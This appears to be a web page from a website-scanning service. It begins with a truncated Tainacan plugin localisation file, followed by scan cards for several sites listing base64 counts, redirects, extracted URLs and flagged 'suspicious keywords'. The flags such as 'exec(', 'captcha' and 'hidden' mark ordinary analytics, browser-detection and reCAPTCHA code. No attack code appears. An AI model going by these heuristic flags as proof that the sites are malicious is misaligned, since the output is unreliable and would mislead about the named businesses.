ese caso, ser\u00eda conveniente informar a los desarrolladores de Tainacan acerca del problema.","error_408_detail":"Esta solicitud ha superado el tiempo de espera del servidor. Esto puede estar causado por una conexi\u00f3n lenta o problemas de conectividad. Si no es algo perceptible en otras p\u00e1ginas, intenta contactar con el administrador.","error_413_detail":"This request exceeded the server size limit. This can be caused by lack of configurations in the server side. Try contacting the administrator.","error_500_detail":"Se ha producido un error interno del servidor. Este error puede ocurrir por una variedad de razones, y se puede encontrar una descripci\u00f3n m\u00e1s detallada en los registros del servidor. Intenta ponerte en contacto con el administrador y proporciona informaci\u00f3n sobre el momento en que se produjo el error.","error_502_detail":"Esta respuesta de error significa que el servidor, mientras trabajaba como puerta de enlace para obtener la respuesta necesaria para la solicitud, ha obtenido una respuesta no v\u00e1lida. Intenta contactar con el administrador.","error_503_detail":"Es posible que el servidor no est\u00e9 disponible debido a un acceso m\u00faltiple, alguna inestabilidad o problemas de conexi\u00f3n. Int\u00e9ntalo de nuevo m\u00e1s tarde y, si persiste, contacta con el administrador.","error_504_detail":"Este mensaje de error se da cuando el servidor est\u00e1 actuando como pasarela y no puede obtener una respuesta a tiempo. Intenta ponerte en contacto con el administrador.","error_511_detail":"Tienes que identificarte para tener acceso a esta informaci\u00f3n. Aunque tengas acceso al panel de administraci\u00f3n de Tainacan, puede ser que tus cookies de sesi\u00f3n se hayan perdido. Intenta recargar la p\u00e1gina o volver a acceder en el panel de administraci\u00f3n de WordPress.","error_other_detail":"Algo ha ido mal aqu\u00ed. Por favor, int\u00e9ntalo de nuevo o ponte en contacto con el administrador.","dublin-core":"dublin-core","Dublin Core":"Dublin Core","inbcm-arquivistico":"inbcm-arquivistico","INBCM: Arquiv\u00edstico":"INBCM: Arquiv\u00edstico","inbcm-bibliografico":"inbcm-bibliografico","INBCM: Bibliogr\u00e1fico":"INBCM: Bibliogr\u00e1fico","inbcm-museologico":"inbcm-museologico","INBCM: Museol\u00f3gico":"INBCM: Museol\u00f3gico","entities_labels":{"collections":{"name":"Colecciones","singular_name":"Colecci\u00f3n","add_new":"A\u00f1adir nuevo(a)","add_new_item":"A\u00f1adir nueva colecci\u00f3n","edit_item":"Editar colecci\u00f3n ","new_item":"Nueva colecci\u00f3n","view_item":"Ver colecci\u00f3n","view_items":"Ver las colecciones","search_items":"Buscar colecciones","not_found":"No se han encontrado colecciones ","not_found_in_trash":"No se han encontrado colecciones en la papelera","parent_item_colon":"Colecci\u00f3n padre:","all_items":"Todas las colecciones","archives":"Archivo de las colecciones","menu_name":"Colecciones"},"metadata":{"name":"Metadatos","singular_name":"Metadatos","add_new":"A\u00f1adir nuevo(a)","add_new_item":"A\u00f1adir nuevo metadato","edit_item":"Editar metadato","new_item":"Nuevos metadatos","view_item":"Ver metadato","search_items":"Buscar metadato","not_found":"Ning\u00fan metadato encontrado","not_found_in_trash":"No se han encontrado metadatos en la papelera","parent_item_colon":"Metadato padre:","menu_name":"Metadatos"},"metadata-sections":{"name":"Metadata Sections","singular_name":"Metadata Section","add_new":"A\u00f1adir nuevo(a)","add_new_item":"Add new Metadata Section","edit_item":"Edit Metadata Section","new_item":"New Metadata Section","view_item":"View Metadata Section","search_items":"Search Metadata Section","not_found":"No Metadata Section found ","not_found_in_trash":"No Metadata Section found in trash","parent_item_colon":"Parent Metadata Section:","menu_name":"Metadata Section"},"filters":{"name":"Filtros","singular_name":"Filtro","add_new":"A\u00f1adir nuevo(a)","add_new_item":"A\u00f1adir nuevo filtro","edit_item":"Editar filtro","new_item":"Nuevo filtro","view_item":"Ver filtros","search_items":"Buscar filtros","not_found":"No se han encontrado filtros ","not_found_in_trash":"No se han encontrado filtros en la papelera","parent_item_colon":"Filtro padre:","menu_name":"Filtros"},"items":{"name":"Elementos","singular_name":"Elemento","add_new":"A\u00f1adir nuevo(a)","add_new_item":"A\u00f1adir nuevo(a)","edit_item":"Editar elemento","new_item":"Nuevo elemento","view_item":"Ver elemento","search_items":"Buscar elementos","not_found":"No se han encontrado elementos","not_found_in_trash":"No se han encontrado elementos en la papelera","parent_item_colon":"Elemento padre:"},"taxonomies":{"name":"Taxonom\u00edas","singular_name":"Taxonom\u00eda","add_new":"A\u00f1adir nuevo(a)","add_new_item":"A\u00f1adir nueva taxonom\u00eda","edit_item":"Editar taxonom\u00eda","new_item":"Nueva taxonom\u00eda","view_item":"Ver taxonom\u00eda","view_items":"Ver taxonom\u00edas","search_items":"Buscar taxonom\u00edas","not_found":"No se han encontrado taxonom\u00edas","not_found_in_trash":"No se han encontrado taxonom\u00edas en la papelera","parent_item_colon":"Taxonom\u00eda padre:","all_items":"Todas las taxonom\u00edas","archives":"Archivo de taxonom\u00edas","menu_name":"Taxonom\u00edas"}},"helpers_label":{"collections":{"status":{"title":"Estado","description":"El estado actual de la colecci\u00f3n. Esto tambi\u00e9n afecta a la visibilidad de los elementos de la colecci\u00f3n, ya que los elementos publicados en colecciones privadas no aparecer\u00e1n en el sitio."},"id":{"title":"ID","description":"Identificador \u00fanico"},"name":{"title":"Nombre","description":"El t\u00edtulo de la colecci\u00f3n"},"author_id":{"title":"ID del autor","description":"El ID (cadena num\u00e9rica) de usuario autor de la colecci\u00f3n"},"creation_date":{"title":"Fecha de creaci\u00f3n","description":"La fecha de creaci\u00f3n de la colecci\u00f3n"},"modification_date":{"title":"Fecha de modificaci\u00f3n","description":"La fecha de modificaci\u00f3n de la colecci\u00f3n"},"order":{"title":"Orden","description":"Orden de la colecci\u00f3n. Este metadato se utiliza si las colecciones son ordenadas manualmente."},"parent":{"title":"Colecci\u00f3n padre","description":"Colecci\u00f3n original de la que se heredan las funcionalidades"},"description":{"title":"Descripci\u00f3n","description":"Texto introductorio que describe la colecci\u00f3n"},"slug":{"title":"Slug","description":"Una cadena \u00fanica y depurada que representa la colecci\u00f3n, usada para componer la URL de la colecci\u00f3n. No puede contener caracteres especiales ni espacios."},"default_orderby":{"title":"Metadatos por defecto al ordenar","description":"Propiedad por defecto por la que se ordenar\u00e1n los elementos de esta colecci\u00f3n"},"default_order":{"title":"Orden por defecto","description":"Orden por defecto de los elementos de esta colecci\u00f3n. ASC o DESC"},"default_displayed_metadata":{"title":"Metadatos mostrados por defecto","description":"Lista de las propiedades de la colecci\u00f3n que ser\u00e1n mostradas en la vista de la tabla"},"default_view_mode":{"title":"Modo de visualizaci\u00f3n por defecto","description":"Modo de visualizaci\u00f3n por defecto de la colecci\u00f3n"},"enabled_view_modes":{"title":"Modos de visualizaci\u00f3n activados","description":"Qu\u00e9 modos de visualizaci\u00f3n estar\u00e1n disponibles para que el p\u00fablico elija"},"metadata_section_order":{"title":"Orden de los metadatos","description":"The order of the metadata section in the collection"},"metadata_order":{"title":"Orden de los metadatos","description":"El orden de los metadatos en la colecci\u00f3n"},"filters_order":{"title":"Orden de los filtros","description":"El orden de los filtros en la colecci\u00f3n"},"enable_cover_page":{"title":"Activar la p\u00e1gina de portada","description":"Utilizar esta p\u00e1gina como p\u00e1gina de inicio de esta colecci\u00f3n"},"cover_page_id":{"title":"ID de la p\u00e1gina de portada","description":"Si est\u00e1 activado, esta p\u00e1gina personalizada se usar\u00e1 como portada para esta colecci\u00f3n, en lugar de la lista de elementos por defecto."},"header_image_id":{"title":"Imagen de cabecera","description":"La imagen que se utilizar\u00e1 en la cabecera de la colecci\u00f3n, si el tema tiene una."},"_thumbnail_id":{"title":"Miniatura","description":"Versi\u00f3n cuadrada y reducida de una imagen que ayuda a reconocer y organizar los archivos"},"comment_status":{"title":"Estado del comentario","description":"Estado de los comentarios de la colecci\u00f3n: \u00ababierto\u00bb significa que los comentarios est\u00e1n permitidos, \u00abcerrado\u00bb significa que los comentarios no est\u00e1n permitidos."},"allow_comments":{"title":"Permitir la activaci\u00f3n de comentarios en los elementos","description":"Si esta opci\u00f3n est\u00e1 activada, los elementos de esta colecci\u00f3n pueden ser configurados para activar una secci\u00f3n de comentarios en su p\u00e1gina. \u00abAbierto\u00bb significa que los comentarios est\u00e1n permitidos, \u00abcerrado\u00bb significa que los comentarios no est\u00e1n permitidos."},"allow_item_slug_editing":{"title":"Allow changing the item slug","description":"If this option is enabled, users will be able to modify the item original slug, resulting in changes to the item permalink."},"allow_item_author_editing":{"title":"Allow changing the item author","description":"If this option is enabled, users will be able to modify the item original authorship, resulting in changes to who can edit it and who is credited as creator of it."},"submission_anonymous_user":{"title":"Permite el env\u00edo por un usuario an\u00f3nimo","description":"Si est\u00e1 activado, permite el env\u00edo por parte de usuarios an\u00f3nimos, que no tienen que acceder con permisos en el sistema de WordPress."},"submission_default_status":{"title":"Estado de env\u00edo del elemento por defecto ","description":"El estado por defecto del elemento que se crear\u00e1 en la colecci\u00f3n despu\u00e9s del env\u00edo."},"allows_submission":{"title":"Permitir el env\u00edo de elementos","description":"Si est\u00e1 activado, la colecci\u00f3n permite el env\u00edo de elementos, por ejemplo, a trav\u00e9s del bloque de env\u00edo de elementos."},"hide_items_thumbnail_on_lists":{"title":"Ocultar la miniatura de los elementos en las listas","description":"Activa esta opci\u00f3n para no mostrar nunca la miniatura del elemento en la lista de elementos. Esta opci\u00f3n es \u00fatil para las colecciones compuestas principalmente por contenido textual."},"submission_use_recaptcha":{"title":"Utiliza verificaci\u00f3n reCAPTCHA en el formulario de env\u00edo","description":"Si est\u00e1 activado, la colecci\u00f3n permite el env\u00edo de elementos usando un reCAPTCHA"},"default_metadata_section_properties":{"title":"Default metadata section properties","description":"The default metadata section properties"},"item_enabled_document_types":{"title":"Enabled document types","description":"The document types that are available in the item edition form."},"item_publication_label":{"title":"Publication area label","description":"The label for the publication section in the item edition form, where author, status, slug and comments options appear"},"item_document_label":{"title":"Main document label","description":"The label for the main document section in the item edition form"},"item_thumbnail_label":{"title":"Thumbnail label","description":"The label for the thumbnail section in the item edition form"},"item_enable_thumbnail":{"title":"Item thumbnail","description":"If enabled, each item can have a thumbnail customized instead of the one automatically generated based on the item document."},"item_attachment_label":{"title":"Attachments label","description":"The label for the attachments section in the item edition form"},"item_enable_attachments":{"title":"Item attachments","description":"If enabled, each item can have a set of files attached to it, complementary to the item document."},"item_enable_metadata_focus_mode":{"title":"Metadata focus mode","description":"If enabled, a button can start a special navigation mode, that focus one metadatum per time in the item edition form."},"item_enable_metadata_required_filter":{"title":"Metadata required filter","description":"If enabled, a switch can be toggled to display only required metadata in the item edition form."},"item_enable_metadata_searchbar":{"title":"Metadata search bar","description":"If enabled, a search bar can be used for filtering the list of metadata in the item edition form."},"item_enable_metadata_collapses":{"title":"Metadata collapses","description":"If enabled, each metadata in the item form will be wrapped in a collapsable component."},"item_enable_metadata_enumeration":{"title":"Metadata enumeration","description":"If enabled, the metadata sections and their metadata in the item form will be enumerated automatically."}},"metadata":{"status":{"title":"Estado","description":"Status for control of visibility and access."},"id":{"title":"ID","description":"Identificador \u00fanico"},"name":{"title":"Nombre","description":"Nombre del metadato"},"slug":{"title":"Slug","description":"Una cadena \u00fanica y depurada que representa los metadatos"},"order":{"title":"Orden","description":"Orden del metadato. Este metadato se utilizar\u00e1 si las colecciones se ordenan manualmente."},"parent":{"title":"Padre","description":"Metadato padre"},"description":{"title":"Descripci\u00f3n","description":"The metadatum description. This may provide information on how to fill this metadatum, which will appear inside a tooltip alongside the input label, or below it."},"description_bellow_name":{"title":"Description below name","description":"Whether the metadatum description should be displayed below the input label instead of inside a tooltip."},"placeholder":{"title":"Marcador de posici\u00f3n","description":"El marcador de posici\u00f3n del metadato. Se trata de un mensaje sencillo que aparecer\u00e1 dentro del campo de texto y que puede indicar al usuario qu\u00e9 tipo de informaci\u00f3n se espera."},"metadata_type":{"title":"Tipo","description":"El nombre de la clase del tipo de metadato, tal como Tainacan\\Metadata_Types\\Core_Title"},"required":{"title":"Obligatorio","description":"Los metadatos son obligatorios. Todos los elementos de esta colecci\u00f3n deben rellenar este campo"},"collection_key":{"title":"Valor \u00fanico","description":"El valor de los metadatos debe ser \u00fanico entre todos los elementos de esta colecci\u00f3n"},"multiple":{"title":"M\u00faltiple","description":"Permitir que los elementos tengan m\u00e1s de un valor para este metadato"},"cardinality":{"title":"N\u00famero m\u00e1ximo de valores","description":"Limita la cantidad de valores de metadatos posibles"},"default_value":{"title":"Valor por defecto","description":"El valor por defecto del metadato"},"metadata_type_options":{"title":"Opciones para el tipo de metadato","description":"Opciones espec\u00edficas para el tipo de metadatos"},"collection_id":{"title":"Colecci\u00f3n","description":"El ID de la colecci\u00f3n"},"accept_suggestion":{"title":"El valor del metadato acepta sugerencias","description":"Permitir a la comunidad sugerir diferentes valores para los metadatos"},"exposer_mapping":{"title":"Asignaci\u00f3n de metadatos de relaci\u00f3n","description":"Opciones de asignaci\u00f3n de metadatos. Aqu\u00ed se pueden configurar los metadatos para que coincidan con otro tipo de distribuci\u00f3n de datos."},"display":{"title":"Mostrar","description":"Mostrar por defecto en el cat\u00e1logo o no mostrar o no mostrar nunca."},"allow_advanced_search":{"title":"Allow advanced search","description":"Allow this metadata to be offered as an option for advanced search"},"semantic_uri":{"title":"El URI de descripci\u00f3n del metadato sem\u00e1ntico","description":"El URI de descripci\u00f3n del metadato sem\u00e1ntico como: https://schema.org/URL"},"repository_level":{"title":"Repositorio de metadatos","description":"Hace que este metadato sea de nivel repositorio en vez de un metadato de colecci\u00f3n"},"metadata_section_id":{"title":"Metadata section","description":"The metadata section ID"}},"metadata-sections":{"status":{"title":"Estado","description":"Status for control of visibility and access."},"id":{"title":"ID","description":"Identificador \u00fanico"},"name":{"title":"Nombre","description":"Name of the metadata section"},"slug":{"title":"Slug","description":"A unique and sanitized string representation of the metadata sction"},"description":{"title":"Descripci\u00f3n","description":"The metadata section description."},"description_bellow_name":{"title":"Description below name","description":"Whether the section metadata description should be displayed below the name instead of inside a tooltip."},"collection_id":{"title":"Colecci\u00f3n","description":"El ID de la colecci\u00f3n"},"is_conditional_section":{"title":"Enable conditional section","description":"Binds this section visibility to a set of rules related to some metadata values."},"conditional_section_rules":{"title":"Conditional section rules","description":"The conditions that will allow this section to be displayed, based on metadata values."}},"filters":{"status":{"title":"Estado","description":"Status for control of visibility and access."},"id":{"title":"ID","description":"Identificador \u00fanico"},"name":{"title":"Nombre","description":"Nombre del filtro"},"order":{"title":"Orden","description":"Orden del filtro. Este metadato se utiliza si los filtros se ordenan manualmente."},"description":{"title":"Descripci\u00f3n","description":"La descripci\u00f3n del filtro"},"filter_type_options":{"title":"Opciones de tipo de filtro","description":"Opciones de tipo de filtro"},"filter_type":{"title":"Tipo","description":"El nombre de la clase del tipo de filtro, tal como filter_type: Tainacan\\Filter_Types\\Checkbox"},"begin_with_filter_collapsed":{"title":"Begin with filter collapsed","description":"With this option enabled, the filter will appear as a button with an add icon, that should be pressed prior to loading any facet information."},"display_in_repository_level_lists":{"title":"Display in repository level lists","description":"With this option enabled, the filter will appear even in repository level items lists, such as the complete items list and the term items list."},"collection_id":{"title":"Colecci\u00f3n","description":"El ID de la colecci\u00f3n"},"metadatum_id":{"title":"Metadatos","description":"Filtrar metadatos"},"max_options":{"title":"M\u00e1ximo de opciones","description":"The maximum number of options to be loaded by default on the filter."},"placeholder":{"title":"Marcador de posici\u00f3n","description":"The filter input placeholder. This is a simple message that will appear inside textual input and may indicate to the user what kind of information is expected."},"description_bellow_name":{"title":"Description below name","description":"Whether the filter description should be displayed below the input label instead of inside a tooltip."}},"items":{"status":{"title":"Estado","description":"La situaci\u00f3n actual del elemento. Observa que la visibilidad del elemento tambi\u00e9n depende del estado de la colecci\u00f3n."},"id":{"title":"ID","description":"Identificador \u00fanico"},"title":{"title":"T\u00edtulo","description":"T\u00edtulo del elemento"},"description":{"title":"Descripci\u00f3n","description":"La descripci\u00f3n del elemento"},"collection_id":{"title":"Colecci\u00f3n","description":"El ID de la colecci\u00f3n"},"author_id":{"title":"Autor","description":"El ID de usuario autor del elemento (cadena num\u00e9rica)"},"slug":{"title":"Slug","description":"Slug is the editable portion of a page link, located a the end of an URL. Usually presents the title of the item without special characters, separated by hiphen instead of spaces."},"creation_date":{"title":"Fecha de creaci\u00f3n","description":"La fecha de creaci\u00f3n del elemento"},"modification_date":{"title":"Fecha de modificaci\u00f3n","description":"La fecha de modificaci\u00f3n del elemento"},"terms":{"title":"ID de t\u00e9rminos","description":"Los IDs de los t\u00e9rminos del elemento"},"document_type":{"title":"Tipo de documento","description":"El tipo de documento, puede ser un adjunto local, una URL externa o un texto"},"document":{"title":"Documento","description":"The item main content. May be a file attached, an URL or a text depending on the type of the document."},"document_options":{"title":"Opciones del documento","description":"Objeto de opciones relacionadas con la visualizaci\u00f3n del documento."},"_thumbnail_id":{"title":"Miniatura","description":"Versi\u00f3n cuadrada y reducida de una imagen que ayuda a reconocer y organizar los archivos"},"comment_status":{"title":"Estado del comentario","description":"Estado de los comentarios de los elementos: \u00ababierto\u00bb significa que los comentarios est\u00e1n permitidos, \u00abcerrado\u00bb significa que los comentarios no est\u00e1n permitidos."}},"taxonomies":{"status":{"title":"Estado","description":"Status for control of visibility and access."},"id":{"title":"ID","description":"Identificador \u00fanico"},"name":{"title":"Nombre","description":"Nombre de la taxonom\u00eda"},"description":{"title":"Descripci\u00f3n","description":"La descripci\u00f3n de la taxonom\u00eda"},"slug":{"title":"Slug","description":"El slug de la taxonom\u00eda"},"allow_insert":{"title":"Permitir inserciones","description":"Permitir/rechazar la creaci\u00f3n de nuevos t\u00e9rminos en la taxonom\u00eda"},"hierarchical":{"title":"Allow terms hierarchy","description":"Allow/Deny the existence of terms children to build a hierarchy"},"enabled_post_types":{"title":"Activado para tipos de contenidos","description":"Activa tambi\u00e9n esta taxonom\u00eda para otros tipos de contenido de WordPress"},"collections_ids":{"title":"Colecciones","description":"Los ID de la colecci\u00f3n donde se utiliza la taxonom\u00eda"}},"tainacan-text":{"display_suggestions":{"title":"Mostrar sugerencias","description":"Muestra un campo de autocompletado que sugiere valores insertados anteriormente en otros elementos para este metadato."},"mask":{"title":"Mask input","description":"Define a pattern of fixed characters that will be used to mask the input. Learn how to build mask patterns \u003Ca target=\"_blank\" href=\"https://imask.js.org/guide.html#masked-pattern\"\u003Ehere\u003C/a\u003E."},"maxlength":{"title":"Maximum of characters","description":"Limits the character input to a maximum value an displays a counter."}},"tainacan-textarea":{"maxlength":{"title":"Maximum of characters","description":"Limits the character input to a maximum value an displays a counter."}},"tainacan-date":{"min":{"title":"Minimum","description":"The minimum value that the input will accept."},"max":{"title":"Maximum","description":"The maximum value that the input will accept."}},"tainacan-numeric":{"step":{"title":"Paso","description":"La cantidad que se aumenta o disminuye al hacer clic en los botones de control del filtro. Esto tambi\u00e9n define si la entrada acepta n\u00fameros decimales."},"min":{"title":"Minimum","description":"The minimum value that the input will accept."},"max":{"title":"Maximum","description":"The maximum value that the input will accept."}},"tainacan-selectbox":{"options_separator":{"title":"Separador de opciones","description":"Car\u00e1cter para separar las opciones en el siguiente campo de texto."},"options":{"title":"Opciones","description":"Crea opciones para lo que est\u00e1 seleccionado. Escribe el car\u00e1cter \u00abseparador de opciones\u00bb para a\u00f1adir una nueva."}},"tainacan-relationship":{"collection_id":{"title":"Colecci\u00f3n relacionada","description":"Selecciona la colecci\u00f3n para buscar los elementos"},"search":{"title":"Metadato relacionado","description":"Selecciona los metadatos que se utilizar\u00e1n como criterio de b\u00fasqueda en la colecci\u00f3n de destino y como r\u00f3tulo al representar la relaci\u00f3n"},"display_related_item_metadata":{"title":"Metadatos mostrados del elemento relacionado","description":"Selecciona los metadatos que se mostrar\u00e1n del elemento relacionado."},"display_in_related_items":{"title":"Mostrar en \u00abElementos relacionados con \u00e9ste\u00bb","description":"Incluye los elementos enlazados por estos metadatos en una lista de elementos relacionados."},"accept_draft_items":{"title":"List and accept draft items on the relation","description":"Include draft items as possible options to the relationship metadata."},"accept_only_items_authored_by_current_user":{"title":"Bind items only by current author","description":"Accept stabelishing the replationship only with items authored by the current user editing the item."}},"tainacan-taxonomy":{"taxonomy_id":{"title":"Taxonom\u00eda relacionada","description":"Selecciona la taxonom\u00eda para buscar los t\u00e9rminos"},"input_type":{"title":"Tipo de entrada","description":"El tipo de HTML utilizado en la lista de t\u00e9rminos"},"visible_options_list":{"title":"Lista de opciones siempre visible","description":"Marca esta opci\u00f3n si est\u00e1s mostrando una casilla de verificaci\u00f3n o un tipo de entrada de radio y deseas que la lista de opciones est\u00e9 siempre visible."},"allow_new_terms":{"title":"Permitir nuevos t\u00e9rminos","description":"Permite crear nuevos t\u00e9rminos directamente en el formulario del elemento."},"link_filtered_by_current_collection":{"title":"Link filtered by current collection","description":"Links to term items list filtered by the collection of the current item instead of a repository level term items page."},"link_filtered_by_collections":{"title":"Enlace filtrado por colecciones","description":"Enlazar para la lista de elementos del t\u00e9rmino, filtrada por ciertas colecciones en lugar de la p\u00e1gina de la lista de los elementos de n\u00edvel repositorio."},"hide_hierarchy_path":{"title":"Hide hierarchy path","description":"Display only the current child term when showing values that belong to a term hierarchy."},"do_not_dispaly_term_as_link":{"title":"Do not display term as link","description":"Do not show terms page link in the term name."}},"tainacan-compound":{"children":{"title":"Metadatos hijos ","description":"La lista de metadatos internos que constituyen este metadato compuesto."}},"tainacan-user":{"default_author":{"title":"Establecer como usuario autor por defecto","description":"Esto establece el valor por defecto de estos metadatos como el autor del elemento actual."}},"tainacan-geocoordinate":{"map_provider":{"title":"Map Tiles provider","description":"Link to the service used as source for displaying tile layers on the map."},"attribution":{"title":"Attribution","description":"Text/HTML to be shown in the attribution control, e.g. \"\u00a9 OpenStreetMap contributors\". It describes source of map data and is often a legal obligation towards copyright holders and tile providers."},"initial_zoom"...
33
base64
5
redirects
2
redirect chains
6
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

command over Creativity, Excellence in spoken word, and outward articulation of inner knowledge.</p>
captcha
hidden

🌐 Extracted URLs 355

https://matangipetals.com/uploads/1d83d9d323d619d65e7156dccc8417086157d487.png
https://98.70.13.131/assets/assets/css/bootstrap.min.css
https://98.70.13.131/assets/assets/css/all.min.css
https://98.70.13.131/assets/assets/css/font.css
https://98.70.13.131/assets/assets/css/swiper.min.css

πŸ” External JavaScript Redirect Chains

Showing first 2 of 2 chains (truncated for performance)

Script: https://www.googletagmanager.com/gtag/js?id=G-VT1PVQ1ZY1
Type: base64_payload
Destination (first appearance): https://www.googletagmanager.com:443/
;1k͎~J})
@`}Τ•uO5w\QR>{"origin":"https://www.googletagmanager.com:443","feature":"SharedWorkerExtendedLifetime","expiry":1776729600,"isThirdParty":true}
Script: https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm
Type: script_src
Destination (first appearance): https://www.gstatic.com/recaptcha/releases/gTpTIWhbKpxADzTzkcabhXN4/recaptcha__en.js
tment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/gTpTIWhbKpxADzTzkcabhXN4/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-H/5bR8BVxoDZIIp1lThX…

πŸ›°οΈ Redirect Follower Findings (6)

Source: inline_js
Method: script_src
document.getElementById('popup-image').onerror = function () {
        this.src = 'https://98.70.13.131/assets/image/placeholder.png';
    };

    document.querySelector('[data-close-notification-popup]').addEv
Status: ok
οΏ½PNG


IHDRοΏ½οΏ½οΏ½οΏ½6οΏ½	pHYsοΏ½οΏ½οΏ½iTXtXML:com.adobe.xmp<?xpacket begin="ο»Ώ" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adob... [truncated]
Source: inline_js
Method: location_assignment
if(prev_url.indexOf(findder) != -1){
                               window.location.href="https://98.70.13.131/user-order";
                           }else{
                             window.locati
Status: ok
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">

        <title>Server Error</title>

        <!-- Fonts -->
        <link rel="preconnect" href="https://fonts.gstatic.com">
        <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet">

        <style>
            /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:... [truncated]
Source: inline_js
Method: location_assignment
1/user-order";
                           }else{
                             window.location.href="https://98.70.13.131/home";
                           }
Status: ok
<!doctype html>
<html lang="en">
   <head>
      <meta charset="utf-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <title>Buy Herbal Oil, Powders, Art Frames , Books Online with Matangi Petals</title>
      <meta name="description" content="Shop herbal oils, powders, spiritual books &amp; art frames at Matangi Metals. Order authentic wellness &amp; spiritual products online. Fast delivery!">
      <link rel="icon" type="image/png" href="https://... [truncated]
Source: inline_js
Method: location_assignment
Chain: https://98.70.13.131/login
// }else{
                              //     window.location.href="https://98.70.13.131/login";
                              // }
                            }else{
Status: ok
<!doctype html>
<html lang="en">
   <head>
      <meta charset="utf-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1.0" />
      <title>Buy Herbal Oil, Powders, Art Frames , Books Online with Matangi Petals</title>
      <meta name="description" content="Shop herbal oils, powders, spiritual books &amp; art frames at Matangi Metals. Order authentic wellness &amp; spiritual products online. Fast delivery!">
      <link rel="icon" type="image/png" href="https://... [truncated]
Source: external_js
Method: base64_payload
;1k͎~J})
@`}Τ•uO5w\QR>{"origin":"https://www.googletagmanager.com:443","feature":"SharedWorkerExtendedLifetime","expiry":1776729600,"isThirdParty":true}
Status: ok
<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 404 (Not Found)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 ... [truncated]
+1 more entries (see JSON)
4
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != null) { rv = parseFloat(RegExp.$1); } } else if (n.appName == "Netscape") { rv = 11; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != null) { rv = parseFloat(RegExp.$1); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 21

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://api.whatsapp.com/send/?phone=79168411253
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
39
base64
1
redirects
6
suspicious keywords

πŸ” Suspicious Keywords 6

CaptchaError
captcha
captchaSiteKey
robot
Robot
hidden

🌐 Extracted URLs 188

https://gmpg.org/xfn/11
https://yoast.com/product/yoast-seo-wordpress/
https://senevie.com/
https://senevie.com/
https://schema.org
2
base64
2
redirects
2
suspicious keywords

πŸ” Suspicious Keywords 2

robot
hidden

🌐 Extracted URLs 210

http://gmpg.org/xfn/11
https://scillarodriguez.com/feed/
https://scillarodriguez.com/comments/feed/
https://scillarodriguez.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fscillarodriguez.com%2F
https://scillarodriguez.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fscillarodriguez.com%2F&#038;format=xml
26
base64
1
redirects
1
redirect chains
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

captcha
captcha-js
robot
Robot
hidden

🌐 Extracted URLs 150

https://www.dorper.com.au/xmlrpc.php
https://www.dorper.com.au/wp-content/uploads/2018/01/cropped-logo.png
https://www.dorper.com.au/wp-content/themes/NativeChurch/images/apple-iphone.png
https://www.dorper.com.au/wp-content/themes/NativeChurch/images/apple-iphone-retina.png
https://www.dorper.com.au/wp-content/themes/NativeChurch/images/apple-ipad.png

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://www.google.com/recaptcha/api.js
Type: script_src
Destination (first appearance): https://www.gstatic.com/recaptcha/releases/gTpTIWhbKpxADzTzkcabhXN4/recaptcha__en.js
tment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/gTpTIWhbKpxADzTzkcabhXN4/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-H/5bR8BVxoDZIIp1lThX…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: script_src
